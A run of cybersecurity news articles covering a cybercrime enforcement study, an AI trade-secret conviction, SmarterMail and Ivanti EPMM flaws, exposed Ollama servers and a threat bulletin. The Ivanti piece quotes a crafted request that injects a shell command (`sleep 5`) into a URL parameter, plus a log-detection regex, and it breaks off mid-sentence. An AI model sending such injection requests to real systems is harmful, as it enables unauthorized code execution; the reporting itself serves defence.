The second cluster, namely Germany, the United Kingdom, Russia, Ukraine, the Netherlands, Spain, and France, represents the core of global cyber enforcement capacity outside the U.S. Active EU member-state participation in Europol and Eurojust-facilitated operations demonstrates the Union’s emphasis on a joint, cross-border enforcement approach. The presence of Russia and Ukraine near the top of this list is noteworthy. These states are frequently targets of global law enforcement actions but also conduct their own domestic prosecutions and counter-cybercrime operations, often involving politically sensitive cases.
Entries such as International and European Countries reflect the role of multinational task forces where leadership attribution is shared. These include Europol-coordinated takedowns, Interpol operations, and Five Eyes collaborations. In some cases, law enforcement announcements did not go into detail and only described these multinational actions by European nations or International ones; whenever countries were listed on their own, they were documented as such in our data. The distribution of participating national authorities naturally reflects the same geographic patterns observed in the country-level analysis.
A study of the top 20 institutions involved in reported law enforcement actions highlights the clear dominance of U.S. agencies. The U.S. Department of Justice (DOJ) and the Federal Bureau of Investigation (FBI) lead by a wide margin, followed by private organizations, which appear as a major supporting actor in cybercrime disruption efforts.
The presence of OFAC [13] further illustrates the integration of financial and political instruments into cybercrime responses. The strong representation of private organizations among the supporting entities is particularly noteworthy. In this dataset, private organizations rank among the top three most frequently mentioned participants. Across the 169 institutions analyzed, 74 distinct private entities were identified as supporting efforts in one way or another.
This is a significant indicator of the expanding scale of public-private collaboration, which illustrates its growing importance in the fight against cybercrime. Cybercrime Typologies Overall and Across Age Groups The distribution across actors engaging in cybercrime activity by age group reveals notable variation in crime types across the lifespan. It is noteworthy that some age groups are represented by very few cases, limiting possible interpretation. In our dataset (n=193 offenders with verified age data), the 35-44 age group accounts for 37%, followed by 25-34 years (30%), and 18-24 years (21%), together representing nearly 90% of all identified offenders.
By contrast, younger (12-17 years) and older (55 years and above) groups each account for less than 5% of cases, making statistical analysis of those categories less meaningful. Especially in the case of 12–17-year-olds and younger, it is noteworthy that younger offenders are likely underrepresented, since minors are often shielded from prosecution and public disclosure under national legal frameworks, limiting their visibility in law enforcement reporting. Accordingly, we will focus primarily on the three core age ranges (18-24, 25-34, and 35-44 years), where offender representation is most robust. Among young adults (18-24 years), cyber offense appears highly diverse yet predominantly technically oriented.
Hacking clearly dominates this cohort (30%), followed by Selling Stolen Goods (data) and DDoS attacks (10% each), activities that often rely on technical skill and may serve reputational or exploratory purposes rather than immediate financial gain. A secondary cluster of offenses-malware, fraud, telecom fraud, dark web marketplace activity, and cyber extortion (each 8%)-illustrates the experimental and multifaceted nature of this age group’s engagement in cybercrime. A shift becomes evident among offenders aged 25-34, where activities such as Selling Stolen Goods (Data) (21%), Cyber Extortion (14%), and Malware deployment (12%) dominate. This may indicate a move toward profit-motivated activities among actors of this age.
The trend intensifies with the 35-44 cohort, which is the largest group in this dataset showing the highest diversities of types. Within this group, Cyber Extortion (22%) is the dominant offense, followed by Malware (19%), Cyber Espionage (13%), Hacking (10%), and Money Laundering (7%). Together, these categories account for the vast majority of activities perpetrated by this age group, potentially indicating a focus on high-impact, financially and politically significant actions. Nationality The nationality of the offender was disclosed in 365 cases.
The dataset contains offenders from 64 distinct nationalities, suggesting a wide geographical and cultural spread. Although nationality can provide valuable insight into the geographic and sociopolitical context of offenders, it offers only a partial view in an interconnected digital landscape. Given the transnational nature of the internet and the complex, fluid identities of actors operating across jurisdictions, nationality alone cannot reliably describe the true origin or alignment of cyber operators. The distribution is heavily skewed toward a small number of countries.
Russian nationals dominate the dataset, accounting for 85 individuals (23%), followed by American (11%), Chinese (11%), Ukrainian (9%), and North Korean (5%) offenders. Together, these five nationalities represent over half of all cases (58%). Notably, one explanation for the relatively high number of American offenders could be explained by jurisdictional and reporting bias: U.S. authorities conduct and publicly disclose far more cybercrime prosecutions than most other countries, making American cases more visible in open data.
Offenders of British nationality (n=17) also represent a notable share of contributors. The involvement of Western nations shows two things: the continuous efforts and transparency they offer, and at the same time, that cyber operations and related offenses are not confined to states typically implicated in cybercriminal activity. One explanation could be that we might be seeing a trend towards more home-grown threat actors that are based in Europe, the United Kingdom, and North America, and therefore English-speaking, as a recent article points out [14] . Beyond the top five, offenders represent many other nationalities, the Dutch, French, German, Canadian, Australian, Singaporean, and more.
However, we need to note that lower numerical representation does not necessarily correspond to lower levels of activity, but may instead reflect differences in detection, exposure, or attribution. Key Takeaways Taken together, the findings offer a dual perspective on the fight against cybercrime that examines both the offenders and the law enforcement actors working to counter them. On the offender side, the data highlights persistent asymmetries. The overwhelming majority of identified offenders are male, reflecting trends widely observed in cybercrime research.
Age data indicate that cyber offense is concentrated among adults in their mid-20s to mid-40s, with comparatively few cases involving younger or older individuals. Offense types vary across these age ranges, with younger offenders often engaged in technical and exploratory activities like hacking and DDoS attacks, while older cohorts were more frequently involved in profit-driven or complex operations such as cyber extortion, data theft, and malware deployment. Nationality data shows a strong concentration within a few groups, with Russian nationals alone accounting for nearly a quarter of cases. While nationality cannot fully describe the origins of cybercrime in an interconnected digital space, it provides useful insight into the sociopolitical and regional contexts in which offenders operate.
The types of criminal acts most frequently prosecuted such as cyber-enabled financial crime, extortion and ransomware, and unauthorized access, suggest that most cybercriminal activities remain primarily financially motivated. The analysis of 418 publicly reported law enforcement actions (2021-mid-2025) shows an increasingly active and diversified global law enforcement response. The U.S. Department of Justice and FBI are the most visible, joined by leading European agencies like Europol, Germany’s BKA, and authorities in the Netherlands and France.
Participation from Ukraine, Russia, Australia, Singapore, Japan, and Nigeria illustrates how enforcement has become truly international. Private organizations also play a critical role: seventy-four private companies supported operations in some capacity, showing that public-private partnerships are now essential to ongoing disruption efforts. This is just an excerpt of the coverage on current topics in cyber security. For the full story and in-depth articles on the use and abuse of Generative AI, post-quantum cryptography, Vulnerability management and Cyber Extortion as well as CyberSOC statistics and security predictions, you should check out the Security Navigator 2026!
Head over to the download page and get a copy. [1] Europol – Operation Endgame [2] Verizon – 2025 DBIR Executive Summary [3] FBI IC3 – 2024 Internet Crime Report [4] ENISA – Threat Landscape 2024 [5] Orange Cyberdefense – Security Navigator 2024 [6] Orange Cyberdefense – Security Navigator 2025 [7] U.S. DOJ – Criminal Marketplace Disruption [8] Europol – Coalition Takedown of Criminal Platform [9] Dutch Police – Bohemia/Cannabia Dark Web Takedown [10] Europol – FluBot Malware Takedown [11] Germany BKA – Darknet Kingdom Market [12] Europol – Largest-Ever Botnet Operation [13] U.S. Treasury – Office of Foreign Assets Control (OFAC) [14] Binding Hook – UK Response to Cyber Criminals Note: This article was expertly written and contributed by Diana Selck-Paulsson, Senior Security Researcher at Orange Cyberdefense.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Ex-Google Engineer Convicted for Stealing AI Secrets for China Startup
A former Google engineer accused of stealing thousands of the company’s confidential documents to build a startup in China has been convicted in the U.S., the Department of Justice (DoJ) announced Thursday. Linwei Ding (aka Leon Ding), 38, was convicted by a federal jury on seven counts of economic espionage and seven counts of theft of trade secrets for taking over 2,000 documents containing the tech giant’s trade secrets related to artificial intelligence (AI) technology for the benefit of the People’s Republic of China (PRC). “Silicon Valley is at the forefront of artificial intelligence innovation, pioneering transformative work that drives economic growth and strengthens our national security,” said U.S. Attorney Craig H.
Missakian. “We will vigorously protect American intellectual capital from foreign interests that seek to gain an unfair competitive advantage while putting our national security at risk.” Ding was indicted in March 2024 for transferring sensitive proprietary information from Google’s network to his personal Google Cloud account. The stolen documents included details about the company’s supercomputing data center infrastructure used for running AI models, the Cluster Management System (CMS) software for managing the data centers, and the AI models and applications they supported. Specifically, the trade secrets pertained to - Architecture and functionality of Google’s custom Tensor Processing Unit chips and systems, and Google’s Graphics Processing Unit systems Software that allows the chips to communicate and execute tasks Software that orchestrates thousands of chips into a supercomputer capable of training and executing cutting-edge AI workloads Custom-designed SmartNIC, a type of network interface card used to facilitate high-speed communication within Google’s AI supercomputers and cloud networking products The theft took place between May 2022 and April 2023.
Ding, who joined Google in 2019, is said to have affiliated himself with two tech companies based in China, including a startup named Shanghai Zhisuan Technologies Co., which he founded in 2023, while he was employed by the firm. Ding downloaded the documents to his computer in December 2023, less than two weeks before resigning from Google. “Around June 2022, Ding was in discussions to be the Chief Technology Officer for an early-stage technology company based in the PRC; by early 2023, Ding was in the process of founding his own technology company in the PRC focused on AI and machine learning and was acting as the company’s CEO,” the DoJ said. The 2024 incident also alleged that the defendant took a number of deceitful steps to cover up the theft of trade secrets, including copying the data from Google source files into the Apple Notes application on his company-provided MacBook and then converting the notes to PDF files before uploading them to his Google account.
Furthermore, prosecutors accused Ding of asking another Google employee to use his company-issued access badge to scan into the entrance of a Google building, and give the impression that he was working from the office when, in fact, he was in China. The scheme unravelled in late 2023 when Google learned that he had given a public presentation in China to potential investors about his startup. According to Courthouse News , Ding’s attorney Grant Fondo reportedly argued that Google did not do enough to protect the information, and that they could not have contained trade secrets because the documents in question were available to thousands of employees. “Google chose openness over security,” Fonda said.
In February 2025, Ding was charged with economic espionage, with the superseding indictment also claiming he applied to a Shanghai-based “talent” sponsored by Beijing. The indictment also called out these talent programs for encouraging individuals engaged in research and development outside the country to come to China to contribute to the nation’s economic and technological growth. “Ding’s application for this talent plan stated that he planned to ‘help China to have computing power infrastructure capabilities that are on par with the international level,’” the DoJ said. “The evidence at trial also showed that Ding intended to benefit two entities controlled by the government of China by assisting with the development of an AI supercomputer and collaborating on the research and development of custom machine learning chips.” Ding is scheduled to appear at a status conference on February 3, 2026.
He faces a maximum sentence of 10 years in prison for each count of theft of trade secrets and 15 years in prison for each economic espionage count. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
SmarterMail Fixes Critical Unauthenticated RCE Flaw with CVSS 9.3 Score
SmarterTools has addressed two more security flaws in SmarterMail email software, including one critical security flaw that could result in arbitrary code execution. The vulnerability, tracked as CVE-2026-24423 , carries a CVSS score of 9.3 out of 10.0. “SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method,” according to a description of the flaw in CVE.org. “The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS [operating system] command.
This command will be executed by the vulnerable application.” watchTowr researchers Sina Kheirkhah and Piotr Bazydlo, CODE WHITE GmbH’s Markus Wulftange , and VulnCheck’s Cale Black have been credited with discovering and reporting the vulnerability. The security hole has been addressed in version Build 9511, released on January 15, 2026. The same build also patches another critical flaw ( CVE-2026-23760 , CVSS score: 9.3) that has since come under active exploitation in the wild. In addition, SmarterTools has shipped fixes to plug a medium-severity security vulnerability (CVE-2026-25067, CVSS score: 6.9) that could allow an attacker to facilitate NTLM relay attacks and unauthorized network authentication.
It has been described as a case of unauthenticated path coercion affecting the background-of-the-day preview endpoint. “The application base64-decodes attacker-supplied input and uses it as a filesystem path without validation,” VulnCheck noted in an alert. “On Windows systems, this allows UNC [Universal Naming Convention] paths to be resolved, causing the SmarterMail service to initiate outbound SMB authentication attempts to attacker-controlled hosts. This can be abused for credential coercion, NTLM relay attacks, and unauthorized network authentication.” The vulnerability has been patched in Build 9518, released on January 22, 2026.
With two vulnerabilities in SmarterMail coming under active exploitation over the past week, it’s essential that users update to the latest version as soon as possible. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Two Ivanti EPMM Zero-Day RCE Flaws Actively Exploited, Security Updates Released
Ivanti has rolled out security updates to address two security flaws impacting Ivanti Endpoint Manager Mobile (EPMM) that have been exploited in zero-day attacks, one of which has been added by the U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) to its Known Exploited Vulnerabilities (KEV) catalog. The critical-severity vulnerabilities are listed below - CVE-2026-1281 (CVSS score: 9.8) - A code injection allowing attackers to achieve unauthenticated remote code execution CVE-2026-1340 (CVSS score: 9.8) - A code injection allowing attackers to achieve unauthenticated remote code execution They affect the following versions - EPMM 12.5.0.0 and prior, 12.6.0.0 and prior, and 12.7.0.0 and prior (Fixed in RPM 12.x.0.x) EPMM 12.5.1.0 and prior and 12.6.1.0 and prior (Fixed in RPM 12.x.1.x) However, it bears noting that the RPM patch does not survive a version upgrade and must be reapplied if the appliance is upgraded to a new version. The vulnerabilities will be permanently addressed in EPMM version 12.8.0.0, which will be released later in Q1 2026.
“We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” Ivanti said in an advisory, adding it does not have enough information about the threat actor tactics to provide “reliable atomic indicators.” The company noted that CVE-2026-1281 and CVE-2026-1340 affect the In-House Application Distribution and the Android File Transfer Configuration features. These shortcomings do not affect other products, including Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), or Ivanti Sentry. In a technical analysis, Ivanti said it has typically seen two forms of persistence based on prior attacks targeting older vulnerabilities in EPMM. This includes deploying web shells and reverse shells for setting up persistence on the compromised appliances.
“Successful exploitation of the EPMM appliance will enable arbitrary code execution on the appliance,” Ivanti noted. “Aside from lateral movement to the connected environment, EPMM also contains sensitive information about devices managed by the appliance.” Users are advised to check the Apache access log at “/var/log/httpd/https-access_log” to look for signs of attempted or successful exploitation using the below regular expression (regex) pattern - ^(?!127.0.0.1:\d+ .$).?\/mifs\/c\/(aft|app)store\/fob\/.*?404 “Legitimate use of these capabilities will result in 200 HTTP response codes in the Apache access log, whereas successful or attempted exploitation will cause 404 HTTP response codes,” it explained. In addition, customers are being asked to review the following to look for any evidence of unauthorized configuration changes - EPMM administrators for new or recently changed administrators Authentication configuration, including SSO and LDAP settings New push applications for mobile devices Configuration changes to applications you push to devices, including in-house applications New or recently modified policies Network configuration changes, including any network configuration or VPN configuration you push to mobile devices In the event signs of compromise are detected, Ivanti is also urging users to restore the EPMM device from a known good backup or build a replacement EPMM and then migrate data to the device. Once the steps are performed, it’s essential to make the following changes to secure the environment - Reset the password of any local EPMM accounts Reset the password for the LDAP and/or KDC service accounts that perform lookups Revoke and replace the public certificate used for your EPMM Reset the password for any other internal or external service accounts configured with the EPMM solution The development has prompted CISA to add CVE-2026-1281 to the KEV catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the updates by February 1, 2026.
Update
In a report published January 30, 2026, researchers from watchTowr Labs
said
they reverse-engineered the patches, noting that the RPM fixes modify the Apache HTTPd config to replace two Bash shell scripts (“/mi/bin/map-appstore-url” and “/mi/bin/map-aft-store-url”) with newly introduced Java classes. As a result, the cybersecurity company said, the vulnerability must be exploitable through HTTP, ultimately leading to a specially crafted HTTP GET request that could be used to pull it off -
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,
h=gPath%5B%60sleep%205%60%5D/e2327851-1e09-4463-9b5a-b524bc71fc07.ipa
This stems from the fact that the Bash script “/mi/bin/map-appstore-url” allows users to fetch mobile applications from the Ivanti EPMM-approved application store based on certain parameters, including -
The index of a salt string from “/mi/files/appstore-salt.txt” (kid)
Start time of the download operation (st)
End time of the download operation (et)
SHA256 hash (h), and
The app store file to retrieve (“e2327851-1e09-4463-9b5a-b524bc71fc07”)
In other words, sending an HTTP request to the endpoint “/mifs/c/appstore/fob/3/
Researchers Find 175,000 Publicly Exposed Ollama AI Servers Across 130 Countries
A new joint investigation by SentinelOne SentinelLABS, and Censys has revealed that the open-source artificial intelligence (AI) deployment has created a vast “unmanaged, publicly accessible layer of AI compute infrastructure” that spans 175,000 unique Ollama hosts across 130 countries. These systems, which span both cloud and residential networks across the world, operate outside the guardrails and monitoring systems that platform providers implement by default, the company said. The vast majority of the exposures are located in China, accounting for a little over 30%. The countries with the most infrastructure footprint include the U.S., Germany, France, South Korea, India, Russia, Singapore, Brazil, and the U.K.
“Nearly half of observed hosts are configured with tool-calling capabilities that enable them to execute code, access APIs, and interact with external systems, demonstrating the increasing implementation of LLMs into larger system processes,” researchers Gabriel Bernadett-Shapiro and Silas Cutler added . Ollama is an open-source framework that allows users to easily download, run, and manage large language models (LLMs) locally on Windows, macOS, and Linux. While the service binds to the localhost address at 127.0.0[.]1:11434 by default, it’s possible to expose it to the public internet by means of a trivial change: configuring it to bind to 0.0.0[.]0 or a public interface. The fact that Ollama, like the recently popular Moltbot (formerly Clawdbot), can be hosted locally and operate outside of the enterprise security perimeter, poses new security concerns.
This, in turn, necessitates new approaches to distinguish between managed and unmanaged AI compute, the researchers said. Of the observed hosts, more than 48% advertise tool-calling capabilities via their API endpoints that, when queried, return metadata highlighting the functionalities they support. Tool calling (or function calling) is a capability that allows LLMs to interact with external systems, APIs, and databases, enabling them to augment their capabilities or retrieve real-time data. “Tool-calling capabilities fundamentally alter the threat model.
A text-generation endpoint can produce harmful content, but a tool-enabled endpoint can execute privileged operations,” the researchers noted. “When combined with insufficient authentication and network exposure, this creates what we assess to be the highest-severity risk in the ecosystem.” The analysis has also identified hosts supporting various modalities that go beyond text, including reasoning and vision capabilities, with 201 hosts running uncensored prompt templates that remove safety guardrails. The exposed nature of these systems means they could be susceptible to LLMjacking , where a victim’s LLM infrastructure resources are abused by bad actors to their advantage, while the victim foots the bill. These could range from generating spam emails and disinformation campaigns to cryptocurrency mining and even reselling access to other criminal groups.
The risk is not theoretical. According to a report published by Pillar Security this week, threat actors are actively targeting exposed LLM service endpoints to monetize access to the AI infrastructure as part of an LLMjacking campaign dubbed Operation Bizarre Bazaar. The findings point to a criminal service that contains three components: systematically scanning the internet for exposed Ollama instances, vLLM servers, and OpenAI-compatible APIs running without authentication; validating the endpoints by assessing response quality; and commercializing the access at discounted rates by advertising it on silver[.]inc, which operates as a Unified LLM API Gateway. “This end-to-end operation – from reconnaissance to commercial resale – represents the first documented LLMjacking marketplace with complete attribution,” researchers Eilon Cohen and Ariel Fogel said.
The operation has been traced to a threat actor named Hecker (aka Sakuya and LiveGamer101). The decentralized nature of the exposed Ollama ecosystem, one that’s spread across cloud and residential environments, creates governance gaps, not to mention creates new avenues for prompt injections and proxying malicious traffic through victim infrastructure. “The residential nature of much of the infrastructure complicates traditional governance and requires new approaches that distinguish between managed cloud deployments and distributed edge infrastructure,” the companies said. “For defenders, the key takeaway is that LLMs are increasingly deployed to the edge to translate instructions into actions.
As such, they must be treated with the same authentication, monitoring, and network controls as other externally accessible infrastructure.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ThreatsDay Bulletin: New RCEs, Darknet Busts, Kernel Bugs & 25+ More Stories
This week’s updates show how small changes can create real problems. Not loud incidents, but quiet shifts that are easy to miss until they add up. The kind that affects systems people rely on every day. Many of the stories point to the same trend: familiar tools being used in unexpected ways.
Security controls are being worked on. Trusted platforms turning into weak spots. What looks routine on the surface often isn’t. There’s no single theme driving everything — just steady pressure across many fronts.
Access, data, money, and trust are all being tested at once, often without clear warning signs. This edition pulls together those signals in short form, so you can see what’s changing before it becomes harder to ignore. Major cybercrime forum takedown FBI Seizes RAMP Forum The U.S. Federal Bureau of Investigation (FBI) has seized the notorious RAMP cybercrime forum.
Visitors to the forum’s Tor site and its clearnet domain, ramp4u[.]io, are now greeted by a seizure banner that states the “action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice.” On the XSS forum, RAMP’s current administrator Stallman confirmed the takedown, stating , “This event has destroyed years of my work to create the most free forum in the world, and although I hoped that this day would never come, in my heart I always knew it was possible.” RAMP was launched in July 2021 after both Exploit and XSS banned the promotion of ransomware operations. It was established by a user named Orange , who has since been outed as Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar). “Groups such as Nova and DragonForce are reportedly shifting activity toward Rehub, illustrating the underground’s ability to reconstitute quickly in alternative spaces,” Tammy Harper, senior threat intelligence researcher at Flare.io, said. “These transitions are often chaotic, opening new risks for threat actors: loss of reputation, escrow instability, operational exposure, and infiltration during the scramble to rebuild trust.” WhatsApp privacy claims challenged Lawsuit Claims Meta Can See WhatsApp Chats in Breach of Privacy A new lawsuit filed against Meta in the U.S.
has alleged the social media giant has made false claims about the privacy and security of WhatsApp. The lawsuit claims Meta and WhatsApp “store, analyze, and can access virtually all of WhatsApp users’ purportedly ‘private’ communications” and accuse the company of defrauding WhatsApp’s users. In a statement shared with Bloomberg, Meta called the lawsuit frivolous and said that the company “will pursue sanctions against plaintiffs’ counsel.” Will Cathcart, head of WhatsApp at Meta, said , “WhatsApp can’t read messages because the encryption keys are stored on your phone, and we don’t have access to them. This is a no-merit, headline-seeking lawsuit brought by the very same firm defending NSO after their spyware attacked journalists and government officials.” Complainants claim that WhatsApp has an internal team with unlimited access to encrypted communications, which can grant access to data requests.
These requests are sent to the Meta engineering team, which then grants access to a user’s messages, often without scrutiny, as the lawsuit laid out. These allegations go beyond scenarios where up to five recent messages are sent to WhatsApp for review when a user reports another user in an individual or group chat. The crux of the debate is whether WhatsApp’s security is a technical lock that can’t be picked, or a policy lock that employees can open. WhatsApp has stressed that the messages are private and that “any claims to the contrary are false.” Post-quantum shift accelerates CISA Publishes Guidance for PQC Adoption The U.S.
Cybersecurity and Infrastructure Security Agency (CISA) has published an initial list of hardware and software product categories that support or are expected to support post-quantum cryptography (PQC) standards. The guidance covers cloud services, collaboration and web software, endpoint security, and networking hardware and software. The list aims to guide organizations in shaping their PQC migration strategies and evaluating future technological investments. “The advent of quantum computing poses a real and urgent threat to the confidentiality, integrity, and accessibility of sensitive data — especially systems that rely on public-key cryptography,” said Madhu Gottumukkala, Acting Director of CISA.
“To stay ahead of these emerging risks, organizations must prioritize the procurement of PQC-capable technologies. This product categories list will support organizations making that critical transition.” Government agencies and private sector firms are preparing for the threat posed by the advent of a cryptographically relevant quantum computer (CRQC), which the security community believes will be able to break open some forms of classical encryption. There are also concerns that threat actors could be harvesting encrypted data now in the hopes of accessing it once a quantum codebreaking machine is developed, a surveillance strategy known as harvest now, decrypt later ( HNDL ). Physical access systems exposed 20 Security Flaws in Dormakaba Access Control Systems More than 20 security vulnerabilities (from CVE-2025-59090 through CVE-2025-59109) discovered in Dormakaba physical access control systems could have allowed hackers to remotely open doors at major organizations.
The flaws included hard-coded credentials and encryption keys, weak passwords, a lack of authentication, insecure password generation, local privilege escalation, data exposure, path traversal, and command injection. “These flaws let an attacker open arbitrary doors in numerous ways, reconfigure connected controllers and peripherals without prior authentication, and much more,” SEC Consult said . There is no evidence that the vulnerabilities were exploited in the wild. Fake hiring lures steal logins Recruitment-Themed Emails Lead to Credential Theft A new phishing campaign is leveraging fake recruitment-themed emails that impersonate well-known employers and staffing companies, claiming to offer easy jobs, fast interviews, and flexible work.
“The messages appear in multiple languages, including English, Spanish, Italian, and French, often tailored to the recipient’s location,” Bitdefender said . “Top targets include people in the U.S., the U.K., France, Italy, and Spain.” Clicking on a confirmation link in the message takes recipients to a fake page that harvests credentials, collects sensitive data, or redirects to malicious content. Trusted cloud domains abused New Campaign Exploits Vercel App Domains To Drop GoTo Resolve A novel campaign has exploited the trust associated with *.vercel.app domains to bypass email filters and deceive users with financially themed lures, such as overdue invoices and shipping documents, as part of a phishing campaign observed from November 2025 to January 2026. The activity, which also employs a Telegram-gated delivery mechanism designed to filter out security researchers and automated sandboxes, is designed to deliver a legitimate remote access tool called GoTo Resolve, per Cloudflare .
Details of the campaign were first documented by CyberArmor in June 2025. Cellular location precision reduced Apple Tests Limiting Precise Location From Cellular Networks in iOS With iOS 26.3, Apple is adding a new “limit precise location” setting that reduces the location data available to cellular networks to increase user privacy. “The limit precise location setting enhances your location privacy by reducing the precision of location data available to cellular networks,” Apple said . “With this setting turned on, some information made available to cellular networks is limited.
As a result, they might be able to determine only a less precise location — for example, the neighborhood where your device is located, rather than a more precise location (such as a street address).” According to a new support document, iPhone models from supported network providers will offer the feature. The feature is expected to be available in Germany (Telekom), the U.K. (EE, BT), the U.S. (Boost Mobile), and Thailand (AIS, True).
It also requires iPhone Air, iPhone 16e, or iPad Pro (M5) Wi-Fi + Cellular. Legacy iOS support extended Apple Releases Updates for iOS 12 and iOS 15 In more Apple-related news, the iPhone maker has released security updates for iOS 12 and iOS 15 to extend the digital certificate required by features such as iMessage, FaceTime, and device activation to continue working after January 2027. The update is available in iOS 12.5.8 and iOS 15.8.6 . SEO poisoning-for-hire exposed Black Hat SEO Gets a Boost from Haxor A backlink marketplace has been discovered as a way to help customers get their malicious web pages ranked higher in search results.
The group refers to themselves as Haxor, a slang word for hackers, and their marketplace as HxSEO, or HaxorSEO. The threat actors have established their operations and marketplace on Telegram and WhatsApp. The marketplace allows fraudsters to purchase a backlink to a website of their choice, from a selection of legitimate domains already compromised by the group. These compromised domains are typically 15-20 years old and have a “trust” score associated with them to show how effective the purchased backlink would be for increasing search engine rankings.
Each legitimate website is compromised with a web shell that enables Haxor to upload a malicious backlink to the site. By buying and then inserting these links into their sites, threat actors can boost search rankings, drawing unsuspecting visitors to phishing pages designed to harvest their credentials or install malware. WordPress sites with plugin flaws and vulnerable php components are the target of these efforts. The operation offers backlinks for just $6 per listing.
The idea is that when users search for keywords like “financial logins” for specific banks, the HxSEO team’s manipulation ensures the compromised sites appear ahead of the legitimate page in the search results. “HxSEO stands out for its emphasis on unethical search engine optimization (SEO) techniques, selling a service that supports phishing campaigns by improving the perceived legitimacy of malicious pages,” Fortra said . HxSEO leverages a range of malicious tools along with unethical Search Engine Optimization (SEO) tactics to ensure malicious sites appear at the top of your search results, making compromised sites harder to spot and to lure more potential victims. They also specialize in illicit backlink sales for SEO poisoning.” The threat actors have been active since 2020.
Phishing hijacks ad accounts Meta Business Accounts Targeted in New Campaign Meta business accounts belonging to advertising agencies and social media managers have been targeted by a new campaign that’s designed to seize control of their accounts for follow-on malicious activities. The phishing attack begins with a message crafted to create urgency and concern, mimicking Meta’s branding to warn recipients of policy violations, intellectual property issues, or unusual activity, and instructing them to click on a fake link that’s engineered to harvest their credentials. “Once an account is compromised, the attacker: changes billing information, adding stolen or virtual cards, launches scam ads promoting fake crypto or investment platforms, [and] removes legitimate administrators, taking full control,” CyberArmor said . Kernel bug flagged as exploited CISA Adds Linux Kernel Flaw to KEV Catalog The U.S.
Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting the Linux kernel to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026. “Linux Kernel contains an integer overflow vulnerability in the create_elf_tables() function, which could allow an unprivileged local user with access to SUID (or otherwise privileged) binary to escalate their privileges on the system,” CISA said. The vulnerability , tracked as CVE-2018-14634 , has a CVSS score of 7.8. There are currently no reports of the flaws’ in-the-wild exploitation.
France pushes video sovereignty France Says Au Revoir to Meet, Teams, Zoom for Sovereign Video Platform The French government has announced plans to replace U.S. videoconferencing apps like Zoom, Microsoft Teams, Google Meet, Webex in favor of a homegrown alternative named Visio as part of efforts to improve security and strengthen its digital resilience. David Amiel, minister delegate for Civil Service and State Reform, said the country cannot risk having its scientific exchanges, sensitive data, and strategic innovations exposed to non-European actors. “Many government agencies currently use a wide variety of tools (Teams, Zoom, GoTo Meeting, or Webex), a situation that compromises data security, creates strategic dependencies on external infrastructure, leads to increased costs, and complicates cooperation between ministries,” the government said .
“The gradual implementation over the coming months of a unified solution, controlled by the state and based on French technologies, marks an important step in strengthening our digital resilience.” Student data tracking blocked Microsoft Ordered to Stop Tracking School Children Microsoft has been ordered to cease the use of tracking cookies in Microsoft 365 Education after the Austrian data protection authority (DSB) found that the company illegally installed cookies on the devices of a minor without consent. These cookies can be used to analyze user behavior, collect browser data, and serve targeted ads. It’s worth noting that German data protection authorities have already considered Microsoft 365 to fall short of GDPR requirements, Austrian non-profit none of your business (NOYB) said. Microsoft has four weeks to cease tracking the complainant.
Cross-border swatting ring busted Teens Suspected in Swatting Attacks Arrested in Hungary and Romania Hungarian and Romanian police have arrested four young suspects in connection with bomb threats, false emergency calls, and the misuse of personal data. The suspects include a 17-year-old Romanian national and three Hungarians aged 16, 18, and 20. As part of the operation, officials confiscated all their data storage devices, mobile phones, and computer equipment. The development comes in the aftermath of a probe that began in mid-July 2025 following a series of phone calls to law enforcement.
The suspects approached victims on Discord, obtained their phone numbers and personal details, and then used that information to place false emergency calls in their names. “The reports included threats to blow up educational and religious institutions and residential buildings, to kill various people, and to attack police units,” authorities said . “The reports required the intervention of a significant police force.” Latin America hit hardest LATAM Experiences Surge in Cyber Attacks in December 2025 According to data from Check Point, organizations experienced an average of 2,027 cyber attacks per organization per week in December 2025. “This represents a 1% month-over-month increase and a 9% year-over-year increase,” the company said .
“While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.” APAC followed with 3,017 weekly attacks per organization (+2% year-over-year), while Africa averaged 2,752 attacks, representing a 10% decrease year-over-year. The education sector remained the most targeted industry in December, averaging 4,349 attacks per organization per week. The other prominent targeted sectors include governments, associations, telecommunications, and energy. Within Latin America, healthcare and medical organizations were the top targets.
Crypto laundering ring punished Chinese National Sentenced to Prison for Crypto Scam The U.S. Department of Justice (DoJ) announced that Chinese national Jingliang Su was sentenced today to 46 months in prison for his role in laundering more than $36.9 million from victims in a digital asset investment scam that was carried out from scam centers in Cambodia. Su has also been ordered to pay $26,867,242.44 in restitution. Su was part of an international criminal network that tricked U.S.
victims into transferring funds to accounts controlled by co-conspirators, who then laundered victim money through U.S. shell companies, international bank accounts, and digital asset wallets. Su pleaded guilty to the charges, along with four others, in June 2025. “This defendant and his co-conspirators scammed 174 Americans out of their hard-earned money,” said Assistant Attorney General A.
Tysen Duva of the Justice Department’s Criminal Division. “In the digital age, criminals have found new ways to weaponize the internet for fraud.” In all, eight co-conspirators have pleaded guilty so far, including Jose Somarriba and ShengSheng He. Major dark web operator convicted Empire Cybercrime Market Owner Pleads Guilty Raheim Hamilton (aka Sydney and Sydney), 30, of Suffolk, Virginia, has pleaded guilty in the U.S. to a federal drug conspiracy charge in connection with operating a dark web marketplace called Empire Market between 2018 and 2020, alongside Thomas Pavey (aka Dopenugget).
